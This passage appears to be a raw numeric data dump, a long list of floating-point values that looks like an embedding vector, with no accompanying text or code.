[ -0.002726929495111108, 0.006562367081642151, -0.005095441360026598, 0.025436561554670334, 0.056016601622104645, -0.0010891089914366603, 0.0005944373551756144, 0.05099136382341385, -0.002403614576905966, 0.005572099704295397, 0.0006193788140080869, -0.0030520916916429996, -0.026663310825824738, 0.01050865463912487, 0.02947152964770794, 0.011048128828406334, -0.03239799290895462, 0.01073035690933466, 0.026352928951382637, -0.01619899645447731, -0.017130142077803612, 0.006104183383285999, -0.00015345907013397664, 0.047385018318891525, -0.0020267220679670572, 0.022111037746071815, 0.03154074400663376, 0.008978914469480515, -0.010168712586164474, 0.012903031893074512, 0.004326875787228346, -0.012903031893074512, 0.019716661423444748, -0.01633201725780964, 0.028348242864012718, -0.00991006102412939, 0.04936555400490761, 0.030254876241087914, -0.052144210785627365, 0.004023883957415819, -0.0059305173344910145, -0.04484283924102783, -0.038132671266794205, 0.006639962550252676, 0.01814997009932995, -0.00473702372983098, 0.0040497491136193275, -0.015253068879246712, -0.03695026412606239, 0.05187816917896271, -0.010796867311000824, -0.055839236825704575, -0.013435116037726402, -0.02715105377137661, -0.0016710757045075297, -0.02151983417570591, 0.04578876867890358, -0.00478505901992321, 0.017795247957110405, 0.023116085678339005, -0.01147675234824419, -0.03139294311404228, 0.01266655046492815, 0.014070660807192326, -0.024431513622403145, 0.02420981228351593, -0.00615960918366909, 0.011321560479700565, -0.01350901648402214, 0.045079320669174194, 0.014728374779224396, 0.014048490673303604, 0.030047954991459846, -0.03198414668440819, 0.010183492675423622, -0.008771992288529873, 0.015400869771838188, -0.01078947726637125, -0.04974983632564545, 0.02301262505352497, -0.025436561554670334, -0.005450163967907429, -0.004936555400490761, -0.015193948522210121, 0.028673404827713966, 0.03866475448012352, -0.06249028444290161, -0.07662006467580795, 0.037245865911245346, -0.04386735334992409, -0.007552633993327618, -0.0017163397278636694, -0.005597964860498905, -0.03872387483716011, -0.026234686374664307, 0.0033347613643854856, -0.047325897961854935, 0.009230175986886024, -0.04859698563814163, 0.011269830167293549, 0.001734814839437604, 0.030240096151828766, -0.01044953428208828, -0.04723721742630005, 0.05415430665016174, 0.022790921851992607, 0.017780466005206108, -0.014720984734594822, 0.02227361872792244, 0.07171307504177094, 0.037009384483098984, -0.0033624740317463875, -0.061899080872535706, 0.00957011803984642, 0.012873471714556217, 0.0031832652166485786, -0.05040016025304794, -0.021992797031998634, -0.02984103374183178, -0.00002346919063711539, -0.007386357523500919, -0.03358040004968643, -0.00655497657135129, -0.03171810507774353, -0.0387829951941967, 0.019997483119368553, 0.006222424563020468, 0.017425743862986565, 0.015652131289243698, 0.0031777226831763983, -0.03588609769940376, -0.02258400060236454, -0.015097877942025661, -0.03026965633034706, 0.018031729385256767, 0.02171197533607483, -0.02308652549982071, 0.03588609769940376, -0.0010133610339835286, 0.0005149943172000349, -0.04055660963058472, -0.012540919706225395, -0.034053362905979156, -0.020485226064920425, -0.05217377096414566, 0.006761898286640644, 0.03109734132885933, -0.022421419620513916, -0.02240663953125477, 0.008964134380221367, -0.017056241631507874, -0.02958977036178112, -0.01223053690046072, 0.0718904361128807, 0.04806490242481232, -0.04904038831591606, -0.0035657004918903112, 0.051139164716005325, -0.010922498069703579, 0.001329285791143775, 0.013309485279023647, -0.023500367999076843, 0.03541313111782074, -0.019790561869740486, -0.012659160420298576, -0.04635041207075119, 0.015533890575170517, 0.0312747023999691, -0.021357253193855286, 0.029057687148451805, -0.010360853746533394, -0.01163194328546524, 0.005900957155972719, 0.005841836798936129, -0.024002891033887863, -0.02020440436899662, 0.020233964547514915, -0.008395100012421608, -0.007596974261105061, -0.008188178762793541, -0.017529204487800598, 0.024667996913194656, -0.008387709967792034, 0.004589222837239504, 0.022938724607229233, -0.034260284155607224, 0.015083097852766514, -0.023500367999076843, 0.035620056092739105, -0.05140520632266998, -0.02469755709171295, -0.002338951686397195, -0.005900957155972719, -0.035324450582265854, 0.0035989556927233934, 0.0010964990360662341, -0.01650937832891941, -0.004803534131497145, 0.06840232759714127, -0.021785875782370567, 0.02759445644915104, 0.005065881181508303, -0.038576073944568634, -0.03428984433412552, -0.04436987638473511, 0.008202958852052689, -0.020115723833441734, 0.028599504381418228, -0.02033742517232895, 0.0006609478150494397, -0.02852560393512249, -0.01313951425254345, 0.03890123590826988, 0.022480539977550507, -0.005923127289861441, 0.01600685343146324, 0.004042359068989754, -0.01695278100669384, -0.002887663198634982, -0.012104906141757965, 0.03588609769940376, -0.011484142392873764, 0.010087422095239162, -0.028126541525125504, -0.04280318692326546, -0.012082736007869244, -0.03461500629782677, 0.02332300692796707, -0.038191791623830795, 0.024121131747961044, 0.029235048219561577, -0.04120693355798721, 0.00931885652244091, 0.02577650360763073, 0.0325162336230278, -0.0018308855360373855, -0.01871161349117756, 0.015083097852766514, -0.011173759587109089, -0.012622210197150707, 0.02678155153989792, -0.0001445679081371054, 0.015474770218133926, -0.002527398057281971, 0.017736125737428665, 0.020721707493066788, -0.0221997182816267, -0.006373920477926731, 0.021992797031998634, 0.0014355177991092205, 0.007922136224806309, 0.01945061795413494, -0.014839226379990578, -0.014994417317211628, 0.013028662651777267, 0.047444138675928116, 0.026485949754714966, 0.018622932955622673, -0.021756315603852272, 0.022746581584215164, 0.006392395589500666, -0.02339690737426281, 0.0019398888107389212, 0.011247660033404827, 0.01983490213751793, -0.010360853746533394, 0.004984590690582991, 0.004700073506683111, 0.031186021864414215, -0.03603389859199524, 0.041945938020944595, 0.007353102322667837, 0.013730717822909355, 0.01865249313414097, -0.004955030512064695, -0.005006760824471712, 0.0027490996289998293, 0.035560932010412216, 0.04014276713132858, -0.03322567790746689, 0.02953065000474453, 0.02684067189693451, -0.006089403294026852, 0.026175566017627716, 0.05598704144358635, -0.030121855437755585, 0.011188539676368237, -0.002817457541823387, 0.003303353674709797, -0.013930249027907848, -0.038989920169115067, -0.020174844190478325, -0.04321702942252159, -0.01532696932554245, 0.019613200798630714, 0.05329706147313118, -0.015785152092576027, 0.08265034854412079, -0.01113680936396122, -0.01260743010789156, -0.007511988747864962, 0.006455210968852043, -0.017307503148913383, -0.010242613032460213, -0.007360492367297411, 0.005324533209204674, 0.03461500629782677, 0.02469755709171295, -0.035058408975601196, -0.018120409920811653, 0.06402741372585297, -0.022037137299776077, -0.007456563413143158, -0.04102957248687744, -0.018105629831552505, -0.007024245336651802, 0.03603389859199524, 0.015046147629618645, -0.0008761831559240818, 0.0059305173344910145, -0.0369207039475441, 0.006846883799880743, -0.045256681740283966, -0.010087422095239162, 0.03171810507774353, 0.01869683340191841, -0.05223289132118225, -0.0016526005929335952, -0.0005029854946769774, 0.039492443203926086, 0.020869508385658264, -0.010235222987830639, 0.0019860765896737576, -0.04366043210029602, -0.04046792909502983, -0.03890123590826988, 0.008291639387607574, 0.028244782239198685, 0.005387348588556051, -0.03467412665486336, -0.010604726150631905, -0.003172180149704218, -0.006292629987001419, 0.022007577121257782, 0.04773974046111107, -0.005801191553473473, 0.012644380331039429, 0.004171684850007296, 0.06166259944438934, -0.01814997009932995, 0.0009219090570695698, -0.025229640305042267, 0.003741214284673333, 0.03996540606021881, -0.03485148772597313, -0.012806961312890053, 0.012518749572336674, 0.030624378472566605, -0.0368911437690258, 0.003576785558834672, -0.0008355378522537649, -0.007729995064437389, 0.0003080728347413242, 0.022687461227178574, 0.04123649373650551, -0.002540330635383725, 0.016065973788499832, -0.021135549992322922, -0.009584898129105568, -0.05196684971451759, -0.008114278316497803, 0.022007577121257782, 0.011949715204536915, 0.021785875782370567, -0.010774697177112103, -0.012984322383999825, 0.016169436275959015, 0.02709193341434002, -0.05637132376432419, 0.028510823845863342, -0.01166889350861311, -0.030742619186639786, -0.010220442898571491, -0.005479724146425724, -0.012208366766571999, -0.0038428273983299732, 0.008757212199270725, 0.021918896585702896, 0.03594521805644035, -0.019317597150802612, -0.013206024654209614, 0.05935690551996231, -0.05249893665313721, -0.019169796258211136, -0.012237926945090294, 0.00769304484128952, -0.017603104934096336, -0.04156165570020676, 0.029501089826226234, -0.003658076049759984, 0.024298492819070816, 0.0048515694215893745, 0.009777040220797062, 0.01398198027163744, 0.01927325688302517, -0.0014733917778357863, 0.0284664835780859, 0.01575559191405773, 0.03795531019568443, -0.025983424857258797, 0.0017052546609193087, 0.022096257656812668, -0.03854651376605034, -0.030476577579975128, 0.0368911437690258, 0.027801377698779106, 0.0525580570101738, -0.00695773446932435, -0.014706204645335674, 0.026412049308419228, 0.0009108239901252091, 0.02364816889166832, 0.010279563255608082, 0.001686779549345374, 0.003377254121005535, -0.012548309750854969, -0.036063458770513535, 0.029796693474054337, 0.047385018318891525, -0.02415069192647934, -0.010966838337481022, 0.011447192169725895, -0.018489912152290344, -0.010900327935814857, -0.0008050538599491119, -0.008579851128160954, 0.009156275540590286, -0.019317597150802612, 0.003563852980732918, 0.00011344885569997132, -0.027372755110263824, 0.0075563290156424046, 0.01385634858161211, -0.013826788403093815, -0.048005782067775726, 0.008831112645566463, -0.009873110800981522, -0.010427364148199558, -0.021046869456768036, 0.006976209580898285, -0.01946539804339409, -0.0350288487970829, -0.030565258115530014, -0.029042907059192657, -0.019051555544137955, -0.008742432110011578, -0.01633201725780964, -0.0032848785631358624, 0.022864824160933495, -0.013863738626241684, -0.05040016025304794, 0.04366043210029602, -0.030107075348496437, 0.009326246567070484, 0.005346703343093395, 0.0022484236396849155, 0.006588232237845659, 0.008350759744644165, 0.027919618412852287, -0.021312912926077843, -0.015932952985167503, -0.004323180764913559, -0.00399062829092145, 0.002828542608767748, -0.006222424563020468, 0.03964024409651756, -0.007840845733880997, -0.019435837864875793, 0.002438717521727085, 0.025850404053926468, -0.03133382275700569, -0.023426467552781105, -0.02645638957619667, 0.00508066127076745, 0.018179530277848244, -0.0056275250390172005, 0.0016526005929335952, -0.005963772535324097, 0.0009066670900210738, 0.0023241715971380472, 0.023293446749448776, 0.008978914469480515, -0.015504330396652222, -0.02984103374183178, -0.0008101345156319439, -0.05743549019098282, -0.05099136382341385, -0.0240767914801836, 0.03810311108827591, -0.016568498685956, 0.027993520721793175, 0.014499283395707607, 0.017366623505949974, 0.019036775454878807, 0.03765970841050148, -0.006584537215530872, -0.05078444257378578, 0.031186021864414215, -0.02839258313179016, -0.0016877033049240708, -0.00625567976385355, -0.014373652637004852, 0.022672681137919426, -0.055277593433856964, -0.02420981228351593, -0.038310032337903976, 0.02784571796655655, 0.029427189379930496, 0.014610134065151215, 0.003961068112403154, -0.032930076122283936, -0.006174389272928238, -0.03026965633034706, 0.005017845891416073, 0.004943945445120335, -0.009592288173735142, 0.03307787701487541, -0.013501626439392567, -0.0006452439702115953, -0.021475493907928467, -0.025687823072075844, -0.009326246567070484, -0.005184121895581484, 0.018002169206738472, -0.016346797347068787, 0.04543404281139374, 0.01820909045636654, -0.008742432110011578, -0.009171055629849434, 0.01956886053085327, 0.0010179798118770123, 0.02790483832359314, -0.05022279918193817, 0.0053356182761490345, 0.024978378787636757, 0.029560210183262825, -0.01764744520187378, -0.028496043756604195, 0.022968284785747528, -0.00730137201026082, 0.006163304205983877, -0.004622478038072586, 0.026308588683605194, -0.009466657415032387, 0.02151983417570591, -0.01132895052433014, 0.007412223145365715, 0.018933314830064774, -0.0013375995913520455, 0.0008609411306679249, -0.0008244527853094041, 0.002379596931859851, 0.022554440423846245, 0.009858330711722374, 0.032368432730436325, 0.020485226064920425, -0.00576793635264039, 0.038132671266794205, -0.039196841418743134, -0.018105629831552505, 0.005649695172905922, 0.02889510616660118, -0.02602776512503624, -0.0011297543533146381, -0.011897984892129898, 0.0007200682885013521, 0.019317597150802612, 0.016938000917434692, 0.012112296186387539, 0.004408166278153658, -0.020721707493066788, 0.01645025797188282, -0.03301875665783882, 0.023485587909817696, 0.01619899645447731, 0.02465321682393551, 0.0030520916916429996, 0.005088051315397024, -0.04156165570020676, -0.022303178906440735, -0.00611526845023036, -0.01151370257139206, 0.017056241631507874, -0.011698453687131405, 0.003938897978514433, 0.04354219138622284, -0.014211071655154228, -0.010841207578778267, 0.01933237724006176, -0.019982703030109406, -0.02382552996277809, 0.044015154242515564, 0.025673042982816696, -0.0015463685849681497, -0.013738107867538929, 0.013501626439392567, 0.017780466005206108, 0.015533890575170517, -0.04241890460252762, 0.03026965633034706, -0.008010816760361195, 0.020100943744182587, 0.05838141590356827, -0.035679176449775696, 0.0075600240379571915, -0.013191244564950466, -0.0021043175365775824, -0.00349549506790936, 0.003404966788366437, 0.03972892463207245, 0.011831474490463734, -0.03641818091273308, 0.036743342876434326, -0.049690715968608856, -0.005306058097630739, 0.008801552467048168, 0.004751803819090128, 0.02165285497903824, 0.003816962242126465, 0.0055018942803144455, -0.01820909045636654, -0.001839199336245656, 0.024387173354625702, -0.044635917991399765, -0.016849320381879807, 0.0028119150083512068, 0.037630148231983185, 0.02140159346163273, -0.006211339496076107, -0.011565432883799076, -0.03159986436367035, 0.03195458650588989, -0.0044783721677958965, 0.020751267671585083, -0.03109734132885933, -0.0275205560028553, 0.0031998928170651197, 0.021815435960888863, 0.025244420394301414, 0.011373290792107582, 0.004367521032691002, 0.014462333172559738, 0.026559850201010704, 0.011772354133427143, 0.021342473104596138, -0.009518387727439404, 0.02283526211977005, 0.03473324701189995, -0.004940250422805548, -0.005379958543926477, -0.03390556201338768, -0.02583562396466732, -0.015504330396652222, -0.014706204645335674, 0.014203681610524654, 0.0045190174132585526, -0.01044953428208828, -0.020721707493066788, 0.019243696704506874, -0.0003618816554080695, 0.027683136984705925, -0.02245097979903221, -0.0077226050198078156, 0.035383570939302444, -0.033876001834869385, -0.010124372318387032, -0.002143115270882845, -0.005398433655500412, 0.0016101077198982239, -0.012467019259929657, 0.006710167974233627, -0.008335979655385017, 0.019435837864875793, -0.012141856364905834, 0.017543984577059746, 0.010087422095239162, -0.025067059323191643, 0.00853551086038351, 0.01460274402052164, -0.0021301826927810907, -0.008609411306679249, -0.009119325317442417, 0.006806238554418087, 0.035738296806812286, -0.009171055629849434, -0.020721707493066788, 0.010855987668037415, 0.03659554198384285, -0.009695748798549175, 0.017869148403406143, -0.02508183941245079, 0.00991006102412939, -0.02434283308684826, -0.002691826783120632, 0.011498922482132912, 0.00502154091373086, -0.0033458464313298464, 0.014514063484966755, -0.013715937733650208, 0.00026996785891242325, 0.008099498227238655, 0.029382849112153053, 0.017662225291132927, 0.029855813831090927, 0.01571125164628029, 0.0024368700105696917, 0.008092108182609081, 0.017780466005206108, -0.0063554453663527966, 0.029929714277386665, -0.01639113761484623, -0.010686016641557217, 0.010796867311000824, -0.05563231557607651, -0.013752887956798077, -0.02452019415795803, 0.025288760662078857, 0.004400776233524084, -0.020692147314548492, 0.009496217593550682, -0.018223870545625687, -0.006196559406816959, 0.004829399287700653, 0.01088554784655571, -0.028170881792902946, 0.018297770991921425, 0.006965124513953924, -0.026973692700266838, -0.01602163352072239, 0.019110675901174545, 0.014388432726264, -0.009377976879477501, 0.009363196790218353, -0.03136338293552399, -0.012873471714556217, -0.026101665571331978, -0.006414565723389387, 0.02765357680618763, 0.0055831847712397575, 0.02746143564581871, 0.010552994906902313, -0.021800655871629715, 0.01882985420525074, -0.003994323313236237, -0.018164750188589096, 0.03990628570318222, 0.01681976020336151, 0.006063538137823343, -0.020500006154179573, -0.016479818150401115, -0.01354596670717001, 0.059652507305145264, -0.0026567240711301565, -0.0162581168115139, 0.008683311752974987, 0.02401767112314701, 0.004493152257055044, -0.01059733610600233, -0.012237926945090294, -0.0005025235586799681, 0.003196197794750333, -0.024815797805786133, -0.0022650512401014566, -0.0015131132677197456, -0.0018992435652762651, -0.007463953457772732, 0.043157909065485, -0.026249468326568604, -0.008358149789273739, 0.017854368314146996, -0.003196197794750333, 0.01104073878377676, -0.02490447834134102, -0.018312551081180573, -0.014477113261818886, 0.02364816889166832, 0.012733060866594315, 0.01429236214607954, 0.001325590768828988, 0.02163807488977909, -0.0117280138656497, 0.019731441512703896, -0.0014687729999423027, -0.0018345805583521724, 0.007663484662771225, -0.03978804498910904, 0.012097516097128391, 0.01914023607969284, 0.012407898902893066, -0.005926822312176228, 0.01789870858192444, 0.027609236538410187, -0.015726031735539436, -0.003961068112403154, 0.007526768837124109, -0.006144829094409943, 0.018992435187101364, 0.052824098616838455, -0.045936569571495056, 0.007316152099519968, 0.008868062868714333, -0.02014528401196003, -0.026988472789525986, 0.03414204344153404, 0.00008977759716799483, 0.019716661423444748, 0.00394259300082922, -0.015193948522210121, 0.0032719457522034645, 0.013279925100505352, 0.042330220341682434, -0.00018359662499278784, 0.016612838953733444, -0.022436199709773064, 0.020869508385658264, -0.011720623821020126, 0.006026587914675474, 0.021224232390522957, 0.037068504840135574, -0.028776865452528, -0.0033458464313298464, -0.008868062868714333, -0.00029375459416769445, 0.00009537786536384374, 0.009082375094294548, 0.03304831683635712, -0.0021449627820402384, -0.007275506854057312, -0.0016775419935584068, 0.0010586250573396683, -0.001794859068468213, -0.00753785390406847, -0.024682777002453804, 0.005165646784007549, -0.003924117889255285, -0.0005348550621420145, -0.021992797031998634, -0.011521092616021633, 0.012636990286409855, -0.0035305977798998356, 0.0033587790094316006, 0.03913772106170654, -0.02120945230126381, 0.019731441512703896, 0.04590700939297676, 0.004541187547147274, -0.01664239913225174, 0.006118963472545147, 0.007116620894521475, -0.007936916314065456, 0.0014623067108914256, 0.03570873662829399, -0.013464676216244698, 0.006370225455611944, 0.025599142536520958, -0.008409880101680756, -0.0006988218519836664, -0.06243116408586502, 0.034881047904491425, 0.003478867234662175, -0.033314358443021774, -0.006185474339872599, 0.017410963773727417, 0.0020969274919480085, 0.011838864535093307, 0.0047296336852014065, -0.015459990128874779, -0.022864824160933495, 0.0037910970859229565, 0.006902309134602547, -0.03686158359050751, -0.01385634858161211, -0.03680246323347092, -0.0006955887074582279, 0.017558764666318893, -0.012710890732705593, -0.024978378787636757, -0.039935845881700516, -0.005701425485312939, 0.0076413145288825035, 0.013250364921987057, -0.0017181872390210629, -0.004574442747980356, -0.020869508385658264, -0.010286953300237656, 0.0010336836567148566, -0.008542900905013084, -0.005446468945592642, -0.04930643364787102, -0.019539300352334976, 0.0034603921230882406, -0.014440163038671017, -0.004389691166579723, -0.02545134164392948, -0.022170158103108406, 0.007552633993327618, 0.00945187732577324, -0.019169796258211136, -0.007072280626744032, 0.00325347064062953, 0.009023254737257957, 0.00011038891534553841, -0.014802275225520134, -0.04599568992853165, -0.010759917087852955, -0.013272535055875778, -0.0197018813341856, -0.013789838179945946, -0.00187245465349406, -0.01964276097714901, -0.001626735320314765, 0.02651550993323326, -0.0212685726583004, 0.023928990587592125, -0.00625567976385355, 0.008594631217420101, -0.011609773151576519, -0.004615087993443012, -0.010516044683754444, 0.010804257355630398, 0.003580480581149459, 0.0025865184143185616, 0.00001833079477364663, -0.021667635068297386, 0.018356891348958015, 0.0007865787483751774, -0.0240767914801836, 0.025377441197633743, -0.009843550622463226, -0.004541187547147274, 0.023056965321302414, 0.0013551509473472834, -0.00241654715500772, -0.029235048219561577, 0.002004551701247692, -0.024254152551293373, 0.006747118197381496, -0.007112925872206688, -0.025510462000966072, 0.018593372777104378, -0.015548670664429665, 0.025052279233932495, -0.01557823084294796, -0.031008660793304443, 0.010678626596927643, 0.01701190136373043, -0.032870955765247345, 0.013885908760130405, -0.010737746953964233, 0.005738376174122095, 0.02258400060236454, -0.004700073506683111, -0.017736125737428665, 0.002551415702328086, -0.019302817061543465, 0.03695026412606239, -0.012696110643446445, 0.03301875665783882, 0.007282896898686886, 0.020174844190478325, -0.023988110944628716, 0.012149246409535408, -0.006832103710621595, 0.0026678091380745173, -0.028436923399567604, 0.0019010910764336586, 0.002196693094447255, -0.02351514808833599, 0.0014392128214240074, 0.0013884061481803656, 0.008335979655385017, -0.014890956692397594, 0.05462726950645447, -0.01732228323817253, 0.04336483031511307, -0.03559049591422081, 0.019184576347470284, 0.015873832628130913, -0.010878157801926136, -0.0069096991792321205, 0.013885908760130405, -0.008986304514110088, -0.008202958852052689, -0.02703281305730343, -0.010176102630794048, -0.024062011390924454, 0.00300405640155077, -0.02490447834134102, -0.026929352432489395, -0.01497963722795248, -0.00586400693282485, 0.01073035690933466, 0.01914023607969284, 0.033432599157094955, -0.0007625610451214015, -0.004903300199657679, -0.012533529661595821, -0.010767307132482529, -0.023692509159445763, 0.006798848509788513, -0.006813628599047661, 0.03485148772597313, 0.0039573730900883675, -0.026589410379529, -0.013826788403093815, -0.021844996139407158, 0.02026352472603321, 0.005025235936045647, -0.001960211433470249, 0.022244058549404144, -0.015238288789987564, 0.01163194328546524, -0.018002169206738472, -0.005047406069934368, 0.009784430265426636, 0.020869508385658264, -0.026042545214295387, -0.009695748798549175, 0.00730137201026082, 0.020854728296399117, 0.012533529661595821, -0.006939259357750416, 0.00478505901992321, 0.005834446754306555, 0.009385366924107075, -0.008106888271868229, -0.013937639072537422, -0.014336702413856983, -0.034881047904491425, 0.00979182031005621, 0.025791283696889877, 0.007548938971012831, -0.02364816889166832, -0.015918172895908356, -0.004349045921117067, 0.013693767599761486, 0.005125001538544893, 0.012282268144190311, 0.015977293252944946, -0.013538576662540436, 0.03695026412606239, -0.004722243640571833, 0.046261731535196304, -0.014757934957742691, -0.023928990587592125, -0.03227975219488144, -0.030860859900712967, -0.03683202341198921, 0.004160599783062935, 0.009392756968736649, -0.0022447286173701286, 0.011779744178056717, -0.0057235960848629475, -0.02757967635989189, -0.025599142536520958, -0.00812905840575695, -0.011321560479700565, 0.020972969010472298, 0.011912764981389046, -0.004356435965746641, 0.015593010932207108, 0.01627289690077305, 0.00714618107303977, -0.023101305589079857, 0.013442506082355976, -0.017987389117479324, 0.008565071038901806, 0.001802249113097787, -0.04108869284391403, -0.020411325618624687, 0.013590306974947453, -0.005941602401435375, -0.004319485742598772, 0.03103822097182274, -0.015859052538871765, -0.005860311910510063, -0.007803895510733128, -0.009348416700959206, 0.006144829094409943, -0.014255411922931671, -0.020041823387145996, -0.012481799349188805, -0.04052704945206642, 0.009185835719108582, 0.01000613160431385, -0.015607791021466255, 0.007996036671102047, 0.05054796114563942, -0.004363826010376215, 0.0049069952219724655, 0.018741173669695854, -0.005841836798936129, -0.005790106486529112, 0.0212685726583004, 0.003573090536519885, 0.00794430635869503, 0.008712871931493282, -0.02258400060236454, 0.007855625823140144, 0.007936916314065456, -0.013752887956798077, 0.0032941161189228296, 0.006588232237845659, -0.020677367225289345, 0.016494598239660263, 0.030683498829603195, -0.004526407457888126, -0.008106888271868229, 0.02732841484248638, 0.019361937418580055, 0.0057199010625481606, -0.004548577591776848, -0.009932231158018112, -0.03186590597033501, -0.00910454522818327, -0.048330944031476974, 0.0036469909828156233, -0.01908111572265625, -0.012710890732705593, -0.00556840468198061, -0.023662948980927467, -0.010819037444889545, 0.026944132521748543, 0.013848958536982536, -0.019687101244926453, -0.01676063984632492, -0.027121493592858315, -0.009215395897626877, 0.020721707493066788, 0.013671597465872765, 0.018682053312659264, -0.008749822154641151, 0.00444142147898674, 0.0018308855360373855, 0.01840123161673546, -0.03148162364959717, -0.014624914154410362, 0.013279925100505352, -0.006750813219696283, 0.005841836798936129, -0.002621621126309037, 0.010205662809312344, 0.011018568649888039, -0.009547947905957699, -0.01639113761484623, -0.0057235960848629475, -0.010538214817643166, 0.005871396977454424, 0.004836789332330227, 0.00044617443927563727, 0.04771018028259277, -0.014551013708114624, 0.019657541066408157, 0.00763392448425293, -0.0006420108256861567, -0.010678626596927643, 0.01851947233080864, 0.035442691296339035, -0.00863158144056797, -0.00763392448425293, 0.0025994509924203157, 0.0010438449680805206, 0.011801914311945438, 0.0073789674788713455, -0.00042377333738841116, 0.003560157958418131, -0.019554080441594124, -0.0024959903676062822, 0.009363196790218353, -0.03328479826450348, 0.012444849126040936, 0.0036839412059634924, 0.04017232730984688, -0.002135725226253271, 0.00972530897706747, 0.02007138356566429, -0.013649427331984043, -0.006595622282475233, 0.004275145474821329, 0.021372033283114433, -0.021357253193855286, 0.02227361872792244, 0.004670513328164816, -0.006813628599047661, 0.0162581168115139, -0.02984103374183178, -0.016671959310770035, 0.0001630430342629552, 0.006865358911454678, 0.0008489323081448674, 0.005926822312176228, -0.004748108796775341, 0.007626534439623356, 0.01826821081340313, 0.006118963472545147, 0.015932952985167503, -0.008897623978555202, -0.05081400275230408, -0.009998741559684277, 0.0017652988899499178, 0.021564174443483353, -0.006680607795715332, 0.007574804127216339, 0.0007482428336516023, 0.01035346370190382, 0.007497208658605814, -0.018312551081180573, -0.010205662809312344, 0.0015583774074912071, 0.02008616365492344, -0.015400869771838188, 0.006632572505623102, 0.021933676674962044, 0.005209987051784992, -0.010183492675423622, 0.022244058549404144, 0.0068690539337694645, 0.01902199536561966, -0.009481437504291534, 0.007120315916836262, 0.03535401076078415, -0.009828770533204079, -0.015238288789987564, 0.027490995824337006, -0.011314170435070992, -0.013235584832727909, -0.009082375094294548, -0.03059481829404831, 0.036122579127550125, 0.026057325303554535, -0.014129781164228916, -0.00241654715500772, 0.004326875787228346, -0.0027583371847867966, 0.020366985350847244, 0.01594773307442665, 0.011816694401204586, -0.0001420275802956894, -0.015253068879246712, 0.005852921865880489, 0.023426467552781105, -0.014018930494785309, -0.013146904297173023, 0.009370586834847927, -0.0021006225142627954, -0.008210348896682262, 0.029619330540299416, 0.020692147314548492, -0.003016988979652524, -0.00031777226831763983, -0.007534158881753683, 0.013058222830295563, 0.023219546303153038, 0.013361215591430664, -0.012400508858263493, 0.00217267544940114, -0.008594631217420101, 0.002527398057281971, 0.015112658031284809, -0.01113680936396122, 0.0368911437690258, 0.008372929878532887, 0.014780105091631413, 0.0034917998127639294, -0.0012008835328742862, 0.02295350469648838, -0.019923582673072815, -0.004182769916951656, -0.025599142536520958, -0.00699099013581872, -0.013878518715500832, 0.0012498426949605346, -0.018223870545625687, -0.010870767757296562, -0.00026488720322959125, -0.04120693355798721, 0.0035786330699920654, -0.000051499431720003486, -0.01458057388663292, -0.003678398672491312, -0.005682950373739004, -0.019361937418580055, 0.004315790720283985, 0.0007274583331309259, -0.027757037431001663, 0.008742432110011578, 0.017499644309282303, 0.013612477108836174, 0.0117280138656497, 0.0006988218519836664, 0.0053762635216116905, -0.014831836335361004, -0.030949540436267853, -0.01751442439854145, -0.014462333172559738, -0.003556462936103344, -0.002180065494030714, -0.003735671751201153, 0.005040016025304794, 0.018046509474515915, -0.014284972101449966, 0.020987749099731445, -0.004788754042237997, -0.01939149759709835, -0.004836789332330227, 0.003983238246291876, -0.03307787701487541, 0.025377441197633743, 0.01670151948928833, -0.026382489129900932, -0.018933314830064774, 0.021120769903063774, 0.03304831683635712, 0.0076413145288825035, -0.035324450582265854, -0.023973330855369568, 0.019184576347470284, -0.022997844964265823, -0.007707824930548668, -0.0037190441507846117, 0.007127705961465836, 0.007220081519335508, 0.02196323685348034, 0.017366623505949974, 0.01364203728735447, 0.010700796730816364, 0.01395241916179657, 0.007075975649058819, -0.003853912465274334, 0.0032978111412376165, 0.000162812095368281, 0.005143476650118828, -0.0003581866330932826, -0.010745136998593807, -0.022938724607229233, -0.005682950373739004, 0.012459629215300083, -0.0023241715971380472, -0.0020969274919480085, 0.010782087221741676, -0.003114907303825021, -0.00483309431001544, 0.02765357680618763, -0.0018419706029817462, -0.004818314220756292, 0.03083129972219467, 0.010427364148199558, -0.019110675901174545, -0.017721345648169518, 0.0012849454069510102, -0.011942325159907341, -0.024549754336476326, 0.016804980114102364, 0.01404110062867403, 0.003408661810681224, 0.019361937418580055, -0.012866081669926643, 0.010479094460606575, -0.002932003466412425, 0.011816694401204586, -0.02070692740380764, -0.0037984871305525303, -0.004803534131497145, 0.019051555544137955, 0.0030280740465968847, -0.004892215132713318, 0.002904290799051523, -0.0079812565818429, -0.0008276859298348427, -0.020810388028621674, -0.03579741716384888, 0.005161951761692762, -0.00832119956612587, -0.014854006469249725, -0.016494598239660263, -0.01658327877521515, 0.00806993804872036, -0.00472593866288662, 0.02151983417570591, -0.010168712586164474, -0.03245711326599121, -0.010774697177112103, 0.007415918167680502, -0.019790561869740486, 0.022125817835330963, 0.03742322698235512, -0.013124734163284302, 0.052646737545728683, 0.0034308319445699453, -0.0009389985934831202, -0.008151228539645672, -0.003715349128469825, 0.005653390195220709, -0.007914746180176735, -0.015060927718877792, -0.00014121929416432977, 0.012895641848444939, 0.01231921836733818, -0.011417631059885025, -0.01950974017381668, -0.013435116037726402, 0.0016812370158731937, -0.013087783008813858, 0.00729028694331646, -0.02008616365492344, -0.014174121432006359, 0.02477145753800869, -0.0050732712261378765, 0.006473686080425978, -0.032309312373399734, -0.024416733533143997, -0.01745530404150486, 0.006229814607650042, 0.02382552996277809, -0.014595353975892067, -0.0020248745568096638, -0.0272101741284132, 0.030136635527014732, 0.009377976879477501, 0.016405917704105377, -0.001865988364443183, 0.005372568499296904, -0.02196323685348034, -0.007648704573512077, -0.021593734622001648, -0.010700796730816364, 0.00988789089024067, -0.058470096439123154, -0.02058868668973446, -0.0012646227842196822, 0.01708580181002617, 0.01832733117043972, -0.008461610414087772, 0.016908440738916397, 0.022288398817181587, 0.005856616888195276, -0.02976713329553604, 0.01594773307442665, -0.013161684386432171, 0.038753435015678406, 0.012991712428629398, 0.015932952985167503, 0.01788392849266529, 0.014661864377558231, 0.011225489899516106, 0.016494598239660263, -0.01235616859048605, -0.014033710584044456, -0.006806238554418087, -0.0030354640912264585, -0.007323542144149542, 0.012969542294740677, -0.03015141561627388, 0.013738107867538929, 0.01366420742124319, -0.001636896631680429, 0.001292335451580584, -0.006155914161354303, -0.002030417090281844, -0.00922278594225645, 0.002156047848984599, 0.0010142847895622253, -0.008698091842234135, -0.00447467714548111, -0.020485226064920425, -0.011698453687131405, 0.026072105392813683, 0.009001084603369236, -0.012422678992152214, -0.011299390345811844, 0.00541321374475956, 0.014403212815523148, 0.026545070111751556, 